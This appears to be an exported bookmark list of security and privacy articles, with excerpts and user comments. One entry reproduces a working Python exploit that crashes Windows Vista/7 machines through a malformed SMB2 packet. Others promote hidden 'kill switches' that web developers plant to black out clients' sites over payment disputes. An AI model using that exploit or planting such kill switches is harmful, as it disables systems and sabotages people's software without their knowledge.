Privacy protects us from abuses by those in power, even if we're doing nothing wrong at the time of surveillance. We do nothing wrong when we make love or go to the bathroom. We are not deliberately hiding anything when we seek out private places for reflection or conversation. We keep private journals, sing in the privacy of the shower, and write letters to secret lovers and then burn them. Privacy is a basic human need. For if we are observed in all matters, we are constantly under threat of correction, judgment, criticism, even plagiarism of our own uniqueness. We become children, fettered under watchful eyes, constantly fearful that -- either now or in the uncertain future -- patterns we leave behind will be brought back to implicate us, by whatever authority has now become focused upon our once-private and innocent acts. We lose our individuality, because everything we do is observable and recordable.
Bruce Schneier once again gets good mileage out of his earlier essay on the value of privacy. This time quoting portions in response to a remark made by Eric Schmidt with the typical "If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place" argument.
JSON Hijacking
http://haacked.com/archive/2009/06/25/json-hijacking.aspx
10 Essential Firefox Plugins for the Infosec Professional | dmiessler.com
http://dmiessler.com/blog/10-essential-firefox-plugins-for-the-infosec-professional
I’ve moved to Chrome and Safari as my primary browsers, but nothing compares to Firefox when it comes to functionality and plugin support. Shown below are the information security related plugins I recommend any infosec professional (or enthusiast) install upon spinning up a new Firefox instance.
Source for "Megaupload auto-fill captcha" – Userscripts.org
http://userscripts.org/scripts/review/38736
Auto-fills the megaupload captcha and auto-starts download
10 New Privacy Settings Every Facebook User Should Know
http://www.allfacebook.com/2009/12/facebook-privacy-new/
Last week Facebook rolled out a new version of their privacy settings to all users. Privacy settings are something that many Facebook users are regularly confused about. That’s why we published our original Facebook privacy guide back in February. After millions of people visited our privacy guide, we realized how important privacy is to Facebook users. With the new settings rolled out, we thought that now would be a great time to update the guide with the latest changes. In this guide we present a thorough overview of the most important privacy settings which includes previous settings that are still relevant as well as new privacy settings that have been added by Facebook. The majority of the old privacy settings are still relevant, however there’s a chance that you may now be sharing much more information with the whole world. Make it through our new Facebook privacy guide and you’re guaranteed to be safe.
How to Best a Master Lock - Master lock hack - Gizmodo
http://gizmodo.com/5375600/how-to-best-a-master-lock
Downloads: Process Blocker is a Brick Wall for Unwanted Windows Processes
http://lifehacker.com/5173445/process-blocker-is-a-brick-wall-for-unwanted-windows-processes
As noted in the instructions, Process Blocker runs as a system service, watching for certain processes and killing them off if it finds them running. The app won't provide you a list of background services or apps for selection, though—this is a text affair. If you look in your Task Manager (Control-Shift-Escape), or your super-charged Process Explorer
A list of web application vulnerabilities you cannot afford not to know : はぐれプログラマ清純派
http://blog.mwsoft.jp/article/34221219.html
jsCrypto
http://crypto.stanford.edu/sjcl/
Encrypt data sent back to a server - quickly
We offer a fast, small symmetric encryption library written in Javascript. Though several such libraries exist, jsCrypto offers several advantages.
50 Ways to Fail at Security
http://www.familyhomesecurity.com/50-ways-to-fail-at-security/
Gmail and Google Apps Account Got Hacked
http://www.labnol.org/internet/gmail-and-google-apps-hacked/11799/
gmail recovery
t of all your Gmail / Google Accounts and initiate the password recovery process
Contact made with the Twitter hacker: details of the attack method revealed
http://jp.techcrunch.com/archives/20090719the-anatomy-of-the-twitter-attack/
I see. So it all started with a hijacked email account.
Cloud service security; secret questions; password resets sent to an ID at another service; one ID used to prove the legitimacy of another; it's enough to crack the password of just one of a user's several IDs; a small crack sinks the dam; same as with antivirus
Attack method
My Website Design Was Stolen! Now What? - Smashing Magazine
http://www.smashingmagazine.com/2009/12/18/my-website-design-was-stolen-now-what/
How to obtain and install an SSL/TLS certificate, for free
http://arstechnica.com/security/news/2009/12/how-to-get-set-with-a-secure-sertificate-for-free.ars
Insurgents Hack U.S. Drones - WSJ.com
http://online.wsj.com/article/SB126102247889095011.html
Militants in Iraq have used $26 off-the-shelf software to intercept live video feeds from U.S. Predator drones, potentially providing them with information they need to evade or monitor U.S. military operations. Senior defense and intelligence officials said Iranian-backed insurgents intercepted the video feeds by taking advantage of an unprotected communications link in some of the remotely flown planes' systems. Shiite fighters in Iraq used software programs such as SkyGrabber -- available for as little as $25.95 on the Internet -- to regularly capture drone video feeds, according to a person familiar with reports on the matter. [...] some officials to conclude that militant groups trained and funded by Iran were regularly intercepting feeds. [...] A Reaper costs between $10 million and $12 million each and is faster and better armed than the Predator
Shiite fighters in Iraq used software programs such as SkyGrabber -- available for as little as $25.95 on the Internet -- to regularly capture drone video feeds, according to a person familiar with reports on the matter.
Militants in Iraq have used inexpensive, off-the-shelf software to intercept video feeds from Predator drones.
US aircraft hacked by insurgents in Iraq
Creating a rogue CA certificate
http://www.phreedom.org/research/rogue-ca/
We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted by all common web browsers. This certificate allows us to impersonate any website on the Internet, including banking and e-commerce sites secured using the HTTPS protocol.
铂程斋 -- Give the thief a reason not to rob you: tips from police officer Wang Dawei
http://www.dapenti.com/blog/more.asp?name=xilei&id=20903
Home - FireFound
http://www.firefound.com/
FireFound is an add-on for Firefox and Fennec (mobile Firefox) that helps you find your computer (or mobile phone, in the case of Fennec) if it is lost or stolen. Every time your computer's location changes, FireFound sends a secure message to a central server with its current location. You can then log into the server and see your computer's current location. All of the location data is encrypted, so no one can find out where your computer is without your password. If you lose your computer, you can tell FireFound to clear your personal data (saved passwords, browsing history, etc.) if anyone starts your browser before you can retrieve it.
FireFound is an add-on for Firefox and Fennec (mobile Firefox) that helps you find your computer (or mobile phone, in the case of Fennec) if it is lost or stolen
The tool to trace your laptop through ff's geolocation feature and nuke the computer remotely if needed. Firefox addon.
Firefox add-on that helps you find your computer
Lifehacker - Panda Cloud Antivirus is a Lightweight, Always-Updated Virus Killer - Featured Windows Download
http://lifehacker.com/5234347/panda-cloud-antivirus-is-a-lightweight-always+updated-virus-killer
Panda Cloud Antivirus is a free download for 32-bit Windows only
Panda Cloud Antivirus uses the power of cloud computing to scan and eliminate viruses from your PC that can identify new malware in almost real time. A free download for 32-bit Windows only, and according to CNET will stay free for personal use even after it is released from beta. Read comments for details.
New algorithm guesses SSNs using date and place of birth - Ars Technica
http://arstechnica.com/tech-policy/news/2009/07/social-insecurity-numbers-open-to-hacking.ars
Given these numbers, the authors estimate that even a moderate-sized botnet of 10,000 machines could successfully obtain identity verifications for younger residents of West Virginia at a rate of 47 a minute.
Two researchers have found that a pair of antifraud methods intended to increase the chances of detecting bogus social security numbers has actually allowed the statistical reconstruction of the number using information that many people place on social networking sites.
How to install a "garage door open" indicator
http://www.instructables.com/id/How-to-install-a-quotgarage-door-openquot-indi/
How to install a "garage door open" indicator Ever left your garage door open overnight? In addition to being a terrible energy waster, all the tools, bikes, and other stuff are available to thieves - who might even enter your home via the door from your garage to your living quarters. Install a simple indicator which will alert you if you've left the garage door open. Total cost is less than $30-$40, and you can determine exactly where the indicator will be located.
How the OAuth Security Battle Was Won, Open Web Style - ReadWriteWeb
http://www.readwriteweb.com/archives/how_the_oauth_security_battle_was_won_open_web_sty.php
And that's how a decentralized community solved a security threat in an open identity spec, quickly. One company (Twitter) took a risk at implementing a new technology advocated by an employee of another company (Yahoo's Hammer-Lahav), then an engineer at yet another company found the beginning of the security hole, then news of the whole problem was sent out to contacts on a Wiki, an email list was formed, companies donated their employees' valuable time to aid in the effort, everyone more or less kept their mouths shut (including the unfairly criticized Twitter) and then everyone worked together to find a solution just in time. I think that's a pretty cool story.
RT @jayrosen_nyu: I understood about 40% of this, but wow, what a story. How OAuth Security Battle Was Won, Open Web Style http://tr.im/jICt [from http://twitter.com/CircleReader/statuses/1617435709]
At some point in conversation Hammer-Lahav realized that the problem went far beyond the Twitter implementation. The OAuth protocol had an inherent vulnerability; big companies like Google, Netflix and Yahoo had implemented OAuth and scores of tiny startups had too... OAuth has support, but it doesn't have a centralized authority ready to deal with problems like this. Over the next week a story unfolded as the community moved to deal with the security issue. It's a dramatic story.
10 measures for securing Apache - builder by ZDNet Japan
http://builder.japan.zdnet.com/news/story/0,3800079086,20386932,00.htm
10 Reasons Why Freelancing is the Best Job Security – FreelanceSwitch
http://freelanceswitch.com/the-business-of-freelancing/10-reasons-why-freelancing-is-the-best-job-security/
Is aviation security mostly for show? - CNN.com
http://www.cnn.com/2009/OPINION/12/29/schneier.air.travel.security.theater/index.html
Dear US government and TSA. This is reality, not TV. Please act accordingly not stupidly.
A terrorist attack cannot possibly destroy a country's way of life; it's only our reaction to that attack that can do that kind of damage. The more we undermine our own laws, the more we convert our buildings into fortresses, the more we reduce the freedoms and liberties at the foundation of our societies, the more we're doing the terrorists' job for them.
“By not overreacting, by not responding to movie-plot threats, and by not becoming defensive, we demonstrate the resilience of our society, in our laws, our culture, our freedoms. There is a difference between indomitability and arrogant "bring 'em on" rhetoric. There's a difference between accepting the inherent risk that comes with a free and open society, and hyping the threats.”
Professor Schneier does it again. He puts into words what I've been thinking, much better than I could have done so.
Last week's attempted terror attack on an airplane heading from Amsterdam to Detroit has given rise to a bunch of familiar questions. How did the explosives get past security screening? What steps could be taken to avert similar attacks? Why wasn't there an air marshal on the flight? And, predictably, government officials have rushed to institute new safety measures to close holes in the system exposed by the incident. Reviewing what happened is important, but a lot of the discussion is off-base, a reflection of the fundamentally wrong conception most people have of terrorism and how to combat it.
SecureFiles
http://www.freemacsoft.net/SecureFiles/
SecureFiles, protect your documents easily.
SecureFiles is a simple app which allows you to create encrypted Disk Images to store your sensitive documents.
10 services you must not disable in Windows XP - 10 rules for surviving the IT industry - ZDNet Japan
http://japan.zdnet.com/sp/feature/07tenthings/story/0,3800082984,20399592,00.htm
Only ten, I wonder?
Bluetooth Proximity Lock
http://btprox.sourceforge.net/
Bluetooth Proximity Detection
It locks your computer when you go away from it. How is it done? It locks on one of your Bluetooth devices which are paired to the machine. When you walk away from the computer the device is disconnected and the computer is locked after a timeout.
Amazon.com: Emergency: This Book Will Save Your Life: Neil Strauss: Books
http://www.amazon.com/gp/product/0060898771?ie=UTF8&tag=offsitoftimfe-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0060898771
5 tools that recover your important data : Lifehacker [Japan edition], a blog/media site packed with lifehack tips for getting both work and life done well
http://www.lifehacker.jp/2009/05/090508recovery5softs.html
Windows Exploit Programming Primer Tutorial
http://securitytube.net/Windows-Exploit-Programming-Primer-video.aspx
Lifehacker - Prey Phones Home to Help You Recover Your Stolen Laptop - Security
http://lifehacker.com/5273620/prey-phones-home-to-help-you-recover-your-stolen-laptop
check on this around October 09 to see if any progress has been made
Your laptop is missing. You're completely out of luck, right? Not if your laptop can phone home. Prey is a cross-platform security application that sends home pictures and location data when your laptop goes missing. When your laptop goes missing Prey scans for open WiFi connections. When it can connect, either via WiFi or a hard line it will send you a report including the status of the computer, which programs are running, the active connections, a run down of the network location, a screenshot of the desktop, and if your laptop has an integrated webcam you'll even get a picture of the
Forensics Myths Debunked - The Truth Behind Real CSI Evidence - Popular Mechanics
http://www.popularmechanics.com/technology/military_law/4325774.html
The Truth Behind Real CSI Evidence - Popular Mechanics
As DNA testing has made it possible to re-examine biological evidence from past trials, more than 200 people have had their convictions overturned. In approximately 50 percent of those cases, bad forensic analysis contributed to their imprisonment.
Forensic science was not developed by scientists. It was mostly created by cops, who were guided by little more than common sense. And as hundreds of criminal cases begin to unravel, many established forensic practices are coming under fire. PM takes an in-depth look at the shaky science that has put innocent people behind bars.
Flush.app - Flash Cookie Removal Tool For OS X | MacHacks.TV
http://machacks.tv/2009/01/27/flushapp-flash-cookie-removal-tool-for-os-x/
RT @tweetlicius: Flush.app - #Flash #Cookie Removal Tool For #OSX | #Mac Hacks.TV - http://bit.ly/5z5q0N
UPDATE: 7TH SEP 2009: FLUSH 0.3.1 released Flush has been updated. Hopefully all of the issues raised up till now will be addressed. Flush 0.3.1 is now
8 Things Every Geek Needs to Do Before 2010
http://www.readwriteweb.com/archives/8_things_every_geek_needs_to_do_before_2010.php
Is Your PC Part of a Botnet? - ReadWriteWeb
http://www.readwriteweb.com/archives/is_your_pc_part_of_a_botnet.php
Being part of a botnet is no fun. Your computer becomes your worst enemy, watching everything you do, collecting all of your secrets, and then delivering all that data to the bot-herder; the person who originated the network. But what does it really mean to be part of a botnet, and is there anything that can you do about it?
good information about determining if your pc is infected with malware
Your Passwords Aren't As Secure As You Think; Here's How to Fix That - Passwords - Lifehacker
http://lifehacker.com/5445101/your-passwords-arent-as-secure-as-you-think-heres-how-to-fix-that
If you allow applications to save your passwords, anyone with physical access to your PC can decode them unless you're properly encrypting them—and chances are pretty good you're not. Let's walk through the right and wrong ways to store your passwords.
Conversations About The Internet #5: Anonymous Facebook Employee - The Rumpus.net
http://therumpus.net/2010/01/conversations-about-the-internet-5-anonymous-facebook-employee/?full=yes
Highly interesting insights into Facebook.
Interview, mostly about privacy, with an anonymous Facebook employee: http://bit.ly/6Zrsq1 Worth reading. (via @johnbattelle on FB) – Tim O'Reilly (timoreilly) http://twitter.com/timoreilly/status/7673198122
Anonymous interview with a guy working at Facebook. Mentions HyperPHP
Official Google Blog: A new approach to China
http://googleblog.blogspot.com/2010/01/new-approach-to-china.html
It appears China can't play nice with the other kids.
Very big news you should read this!
wow, good
Congrats to Google for raging against censorship, but WTF? A blog post accusing a foreign government of attacking them? Maybe they're getting a little too big? Ya think?
Whoa. China attacks Google (to steal business information and human rights activist email). Google withdraws from China.
A Sixty-Eight Year Old Code - Entropic Memes
http://www.slugsite.com/archives/957
ink is really cool, though, is that the photo also shows the agent’s worksheet:
German
Web Security: Are You Part Of The Problem? - Smashing Magazine
http://www.smashingmagazine.com/2010/01/14/web-security-primer-are-you-part-of-the-problem/
Website security is an interesting topic and should be high on the radar of anyone who has a Web presence under their control. Ineffective Web security leads to all
I’m A Super.com » Flash Cookies: The Silent Privacy Killer
http://www.imasuper.com/66/technology/flash-cookies-the-silent-privacy-killer/
The Adobe Flash Player maintains proprietary cookies called Local Shared Objects or LSOs. LSOs are capable of storing 100 KB of information for an indefinite amount of time by default. When you clear your browser history in Internet Explorer, Firefox or Opera on Windows, Linux, or OS X, LSOs are not cleared from Adobe's local repository.
OS X
There are hundreds of applications out there from spyware cleaners to built-in browser features that eliminate cookies on the spot, and even let you set cookie policies on your computer regarding what can be stored in your machine, and for how long. I’m assuming that if you’re here reading this post, you already know all of the dangers of cookies on your computer. In all honesty, I don’t seriously believe that they’re the most dangerous form of movement or web tracking, but they can definitely be used to monitor more movements than a person should feel comfortable with.
Explains how to adjust your Flash player settings
Shame on you, Adobe!
Never knew this! Amazing amount of stuff stored on your computer using Flash 'cookies' which never gets cleaned from the browser.
Internet Survival Guide for Traveling Where Privacy Isn't Respected - Google - Lifehacker
http://lifehacker.com/5447560/internet-survival-guide-for-traveling-where-privacy-isnt-respected
great security tips for travelers
Ed. note: On Tuesday, Google responded to cyber attacks aimed at Chinese human-rights activists by ending search-result censorship in China. An anonymous reader with experience living where privacy isn't respected writes in with tips for keeping your data safe in these situations.
Error Level Analyser - Tiny Appz
http://www.tinyappz.com/wiki/Error_Level_Analyser
Image forensics
a small tool used for photo forensics like in this article: http://www.hackerfactor.com/blog/index.php?/archives/322-Body-By-Victoria.html
Thomas Landauer: Preventing Spam in Form Submissions without Using a CAPTCHA
http://www.landauer.at/preventing-spam-in-form-submissions-without-using-a-captcha.php
A smart method to prevent spam in form submissions without using a CAPTCHA
GoogleSharing :: A Special Kind Of Proxy
http://www.googlesharing.net/index.html
GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat.
"GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat. It ultimately aims to provide a level of anonymity that will prevent google from tracking your searches, movements, and what websites you visit. GoogleSharing is not a full proxy service designed to anonymize all your traffic, but rather something designed exclusively for your communication with Google. Our system is totally transparent, with no special "alternative" websites to visit. Your normal work flow should be exactly the same." http://www.thoughtcrime.org/ & http://www.disruptivestudies.org/
GoogleSharing is a system that mixes the requests of many different users together, such that Google is not capable of telling what is coming from whom.
20+ .htaccess Hacks Every Web Developer Should Know About | DevMoose
http://devmoose.com/coding/20-htaccess-hacks-every-web-developer-should-know-about
Apache's .htaccess(hypertext access) configuration file can be a very powerful tool in a web developer's toolkit if used properly. It can be found in the webroot of your server and can be easily edited using any text editor. In this article I'm going to show you 20 .htaccess hacks and how to use them.
SUPERAntiSpyware.com - SUPERAntiSpyware Portable Scanner
http://www.superantispyware.com/portablescanner.html
"Follow the instructions below to download the SUPERAntiSpyware Portable Scanner. The scanner features our complete scanning and removal engine and will detect AND remove over 1,000,000 spyware/malware infections. The scanner does NOT install anything on your Start Menu or Program Files and does NOT need to be uninstalled."
The 3 Facebook Settings Every User Should Check Now - NYTimes.com
http://www.nytimes.com/external/readwriteweb/2010/01/20/20readwriteweb-the-3-facebook-settings-every-user-should-c-29287.html?em
In December, Facebook made a series of bold and controversial changes regarding the nature of its users' privacy on the social networking site. The company once known for protecting privacy to the point of exclusivity (it began its days as a network for college kids only - no one else even had access), now seemingly wants to compete with more open social networks like the microblogging media darling Twitter.
How To Send Completely Anonymous Emails
http://www.makeuseof.com/tag/how-to-send-completely-anonymous-emails/
Have you ever had the need to send completely anonymous emails to someone? Perhaps you were trying to prank one of your friends, or wanted to shyly declare your
Penetration Testing and Vulnerability Analysis - Home
http://pentest.cryptocity.net/
Penetration Testing and Vulnerability Analysis
Innovative course at NYU-Poly that discusses Penetration Testing and Vulnerability Analysis. The course is split into six 2-week modules where an industry expert comes in and teaches a portion of the course. The website has all the course materials and even some of the lectures in video format.
How-To: Speed Up, Customize, and Secure Firefox, Chrome, IE8, and Opera | Maximum PC
http://www.maximumpc.com/article/howtos/howto_speed_up_customize_and_secure_firefox_chrome_ie8_and_opera
With this guide, we will show you the essential initial tweaks everyone should make to “awesomize” their browser. Whether it’s accelerating browser page-load performance, boosting security, or just improving the look of the interface, we teach you the tweaks that we think should be implemented the first time you start up a browser after installation.
Pick Locks Like a Pro
http://www.onlineeducation.net/lock/
Well, it could come in handy for *something*, right?
how to pick a lock!
16 of the Best Password Management Tools for Firefox 3
http://mashable.com/2008/11/05/password-management-for-firefox-3/
Nobody likes having to think up new passwords, which often leads to people using the same ones over and over.  Even if you do come up with some good passwords,
Benlog » Don’t Hash Secrets
http://benlog.com/articles/2008/06/19/dont-hash-secrets/
I know very little about cryptography, but I do find it fascinating. This article seems to have solid, real-world advice, yet it is written in a way that even I can understand it. People who can write like this impress me.
why hash is not security
Panopticlick
http://panopticlick.eff.org/
"Panopticlick tests your browser to see how unique it is based on the information it will share with sites it visits."
is it possible to uniquely identify your browser w/o any cookies involved? apparently, that's quite feasible.
McSweeney's Internet Tendency: Secure Website Authentification Questions.
http://www.mcsweeneys.net/links/lists/8JoelGunz.html
Hahaha, "Why did you choose a liberal-arts degree when your entire family urged you to go into finance?"
What is your mother's maiden name? What is your older sister's favorite Monopoly game piece? Who did your paternal grandfather vote for in the 1956 presidential election? Why did you choose a liberal-arts degree when your entire family urged you to go into finance? In what year did you begin working on your novel? How many weeks away was graduation when you dropped out of college? What was your score on the civil-service employment exam? Where were you sitting when your girlfriend told you she was pregnant? Where did you never end up going for your honeymoon? In what year did you begin working for the post office? What is the name of the hedge-fund manager your ex-wife married? How many hours did it take you to drink that bottle of Jack Daniel's yesterday? What time was it when, in a drunken rage, you threw your novel into the fire? If you could do it all over again, what would you do differently?
I think some of these might actually be in use!
Some Answers: Front Door, 4, 1999, Rome, 2014, 8:22
"Why did you choose a liberal-arts degree when your entire family urged you to go into finance?"
ha
PHP hide_email()
http://www.maurits.vdschee.nl/php_hide_email/
Lets you hide the email addresses on a page; useful for avoiding spam.
A PHP function to protect the E-mail address you publish on your website against bots or spiders that index or harvest E-mail addresses for sending you spam. It uses a substitution cipher with a different key for every page load. Look at the generated XHTML in the example while pressing the browser's "reload" button to see this in effect.
Crack a Wi-Fi Network's WEP Password with BackTrack, the Fancy Video Version - Security - Lifehacker
http://lifehacker.com/5459822/crack-a-wi+fi-networks-wep-password-with-backtrack-the-fancy-video-version
Last summer we detailed how to crack a Wi-Fi network's WEP password using BackTrack. Now video blog Tinkernut revisits the subject with a great video step-by-step of the process.
How To Safely Store A Password | codahale.com
http://codahale.com/how-to-safely-store-a-password/
bcrypt
2010-01-31, by Coda Hale, "Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt. Use bcrypt."
Delete Your Account
http://deleteyouraccount.com/
Information on how to delete your account from all of the major social networking, blogging, shopping, etc. sites and services across the web.
How to delete your account from all kinds of services? One-stop!
Featured Windows Download: PortableTor Protects Your Privacy from Your Thumb Drive
http://lifehacker.com/5130414/portabletor-protects-your-privacy-from-your-thumb-drive
PortableTor is a thumb drive friendly version of the popular anonymous browsing software, Tor.
U.S. enables Chinese hacking of Google - CNN.com
http://www.cnn.com/2010/OPINION/01/23/schneier.google.hacking/
Official misuses are bad enough, but it's the unofficial uses that worry me more. Any surveillance and control system must itself be secured. An infrastructure conducive to surveillance and control invites surveillance and control, both by the people you expect and by the people you don't. The problem is that such control makes us all less safe. Whether the eavesdroppers are the good guys or the bad guys, these systems put us all at greater risk. Communications systems that have no inherent eavesdropping capabilities are more secure than systems with those capabilities built in. And it's bad civic hygiene to build technologies that could someday be used to facilitate a police state.
Under the sensationalist title "USA enables China's hacking of Google" there is a good article, full of important info. http://bit.ly/64uzts [from http://twitter.com/dariuus/statuses/8156429222]
"In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google's system isn't unique. Democratic governments around the world -- in Sweden, Canada and the UK, for example -- are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell."
Schneier on how the mandated backdoor access system allowed for the China incident
Article by Bruce Schneier on China's attack on Google. Hillary Clinton video on internet freedom.
RT @dangoldin: RT @mikkohypponen: Bruce Schneier writes to CNN on Google & China http://bit.ly/6uMYkx [from http://twitter.com/davidajudd/statuses/8152550494]
Bulletproof backups for MySQL | Carsonified
http://carsonified.com/blog/dev/bulletproof-backups-for-mysql/
Great comment on using XFS and snapshots to reduce downtime.
Full Disclosure: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
http://seclists.org/fulldisclosure/2009/Sep/0039.html
Smb-Bsod.py: #!/usr/bin/python from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()
This is why we do regression testing, folks!
7 habits for creating secure PHP applications
http://www.ibm.com/developerworks/jp/opensource/library/os-php-secure-apps/
Distrust input values.
http://note.openvista.jp/2008/php-security-memo/
A PHP security course by IBM. ↓ There is a harsh critique of it. http://d.hatena.ne.jp/ockeghem/20081101/p1 ↓ For reference http://note.openvista.jp/2008/php-security-memo/ Come to think of it, I wonder whether the problem of PHP source code leaking has been solved.
Hueniverse: Explaining the OAuth Session Fixation Attack
http://www.hueniverse.com/hueniverse/2009/04/explaining-the-oauth-session-fixation-attack.html
Computer Worms - Conficker | Microsoft Security
http://www.microsoft.com/protect/computer/viruses/worms/conficker.mspx
Viruses And That-ICT
Ha ha...as if a bounty shall do your hopelessness any good....
The Conficker worm is a computer worm that can infect your computer and spread itself to other computers across a network automatically, without human interaction.
Ask SM: PHP/MySQL Security | How-To | Smashing Magazine
http://www.smashingmagazine.com/2009/04/01/ask-sm-phpmysql-security/
A List Apart: Articles: The Problem with Passwords
http://www.alistapart.com/articles/the-problem-with-passwords/
"Is there a middle path—a way to provide feedback and reduce password errors that doesn’t sacrifice the user experience? At least two design patterns address this issue in offline applications, and with a little JavaScript, we can bring them to the web. [...] The simplest solution is to mask the password by default while giving users a way to switch the field to clear text. [...] Apple adopted an interesting approach. The last letter typed into the field remains visible for a couple of seconds before turning into a dot. This creates an opportunity to catch errors without showing the entire password at once."
PHP Secure Login Tips And Tricks - Hungred Dot Com
http://hungred.com/useful-information/php-secure-login-tips-and-tricks/
when it comes to login pages where our most sensitive data are being held. Hence, there is a need to better understand how well your login page has been implemented to be considered as really secure. In this article, you will get a list of PHP secure login tips and tricks that will definitely help you decide on your secure rating of your login page.
WARNING: Google Buzz Has A Huge Privacy Flaw
http://www.businessinsider.com/warning-google-buzz-has-a-huge-privacy-flaw-2010-2
"It gets to a deeper problem with Google Buzz: It's built on email, which is a very different Internet application than a social network." - I couldn't agree more; this new Google feature should NOT be based on your Gmail contacts, which are typically more private than, say, your friends on Twitter or Facebook.
Suica actually goes down now and then - Kōchaya Kuippa's miscellaneous diary
http://d.hatena.ne.jp/kuippa/20100205/1265389603
Truly a brute-force approach in "Oyakata Hinomaru" (state-backed, money-is-no-object) style.
So what I heard about was a distributed autonomous system. Suica's servers apparently aren't just simply made redundant. Um, I'm bad at explaining things to people, so I'll use another clumsy analogy, but in my understanding it may be close to something like DNS. Something like P2P with a master? There is something like a master node, there are station nodes, and there are clients (ticket gates), and the check is performed at the client. If it isn't there, it probably goes to the center. The timing of pulls and pushes may be quite cleverly worked out. From here on it's just my guess, but since there is horizontal coordination at the station-node level, even if the master is down for about three days in the worst case, the actual impact doesn't readily show, I suppose. If this had been a center-query type of system, it would have cost more and been less stable, they said. Sure enough, this is a little internet world of its own. Yep.
Suica's servers actually go down now and then without anyone knowing. But the system never stops; by their calculations the center can be down for about three days and still be fine. That's why it almost never makes the news that a server went down.
Top 10 Google Settings You Should Know About - Google settings - Lifehacker
http://lifehacker.com/5470671/top-10-google-settings-you-should-know-about/
CSS Killswitch
http://csskillswitch.com/
CSS (short for "Cascading Style Sheets") is the markup that makes the internet look the way it does. CSS Killswitch works by creating a unique, inconspicuous, and innocuous stylesheet that you'll link the potentially problematic client's site to. Should negotiations go south and passwords get changed before you receive payment, that stylesheet can be activated to superficially black out the site, returning to you the upper hand. * When relations return and you've received payment, the killswitch is easily deactivated and its traces removed. Not convinced? Try a two second demo of what it could do to this page. Oh, did I mention this is free? Because it's free.
CSS Killswitch lets you non- destructively black out a difficult client's website with the click of a button.
"BlueScreenView", free software that analyzes and tells you the cause of a blue-screen forced shutdown - GIGAZINE
http://gigazine.net/index.php?/news/comments/20090813_bluescreenview/
ime: date and time the crash occurred Bug Check S
Free software that analyzes and tells you the cause of a blue-screen forced shutdown
It finds, analyzes and displays the dump file generated when a blue screen occurs and tells you the cause of the error, so depending on how you use it, it can be quite handy. It supports the 32-bit editions of Windows XP, Windows Server 2003, Windows Server 2008, Windows Vista and Windows 7, and a 64-bit edition is planned for the future.
A Few Billion Lines of Code Later: Using Static Analysis to Find Bugs in the Real World | February 2010 | Communications of the ACM
http://cacm.acm.org/magazines/2010/2/69354-a-few-billion-lines-of-code-later/fulltext
How Coverity built a bug-finding tool, and a business, around the unlimited supply of bugs in software systems.
“The unusual starts to occur with increasing frequency.”
Reducing the Risk of Human Extinction
http://www.upmc-biosecurity.org/website/resources/publications/2007_orig-articles/2007-10-15-reducingrisk.html
Please Rob Me
http://pleaserobme.com/
RT @hdmoore: Hilarious: http://bit.ly/98Tmfp ( sharing your location isn't always smart )
You could see it coming, eh.
The internet has everything!
The danger is publicly telling people where you are. This is because it leaves one place you're definitely not... home. So here we are; on one end we're leaving lights on when we're going on a holiday, and on the other we're telling everybody on the internet we're not home. It gets even worse if you have "friends" who want to colonize your house. That means they have to enter your address, to tell everyone where they are. Your address.. on the internet.. Now you know what to do when people reach for their phone as soon as they enter your home. That's right, slap them across the face.
Learning OAuth from zero: Part 1 What is OAuth? - The concept of OAuth and what you can do with OAuth | gihyo.jp … Gijutsu-Hyohron Co.
http://gihyo.jp/dev/feature/01/oauth/0001
PHP: Remote Kill Switch - Make Sure You Get Paid » Ready Fire Aim
http://www.billda.com/php-remote-kill-switch
Web Developers: Have you ever gotten to the end of a project, and had a client withhold the last of your fee to exact additional changes or features that were not in the original plan? Perhaps a client that decided your work “wasn’t what we expected” and tried to withhold payment? Well worry no more. Put the power back in your hands with a Remote Kill Switch. The idea is this: you build into their website a small function that checks with a server you control to make sure the client’s account is in good standing. If it is, the site loads as normal. If not, their site doesn’t load, and they get a message asking for payment.
IPRED Watchlist
http://ipred.bitchware.se/
Examine the IPRED law
watch the watchdogs
Five Free Temporary Email Services To Avoid Spam | MakeUseOf.com
http://www.makeuseof.com/tag/five-free-temporary-email-services-to-avoid-spam/
The internet is filled with junk. One of the most common pieces of junk is spam. Many of us are bombarded with spam every day and hate it. Although there are a
tinc, a tool for easily building a VPN - SourceForge.JP Magazine
http://sourceforge.jp/magazine/09/01/29/015235
Nmap 5.00 Release Notes
http://nmap.org/5/
Nmap 5.0 documentation
Nmap has finally gotten a major update after many years. Every network administrator should be familiar with this tool.
Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 5.00 from http://nmap.org/
On the unique IDs of each mobile carrier (covers all carriers) - Paramedius
